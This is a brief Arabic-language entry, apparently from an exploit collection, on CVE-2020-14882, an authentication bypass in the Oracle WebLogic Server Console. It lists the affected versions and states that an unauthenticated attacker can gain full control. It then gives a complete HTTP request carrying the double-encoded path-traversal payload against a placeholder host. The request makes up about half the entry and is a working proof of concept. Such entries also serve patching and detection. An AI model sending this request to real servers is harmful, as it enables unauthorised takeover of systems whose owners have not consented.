
[CVE-2020-14882] تجاوز المصادقة في Oracle WebLogic Server
[CVE-2020-14882] تجاوز المصادقة في Oracle WebLogic Server
ثغرة في منتج Oracle WebLogic Server من Oracle Fusion Middleware (المكوّن: Console). الإصدارات المدعومة المتأثرة هي 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 و 14.1.1.0.0. تسمح هذه الثغرة، التي يسهل استغلالها، لمهاجم غير مصادَق لديه وصول عبر الشبكة باستخدام HTTP باختراق Oracle WebLogic Server. يمكن أن تؤدي الهجمات الناجحة على هذه الثغرة إلى السيطرة الكاملة على Oracle WebLogic Server
GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.9
Connection: close
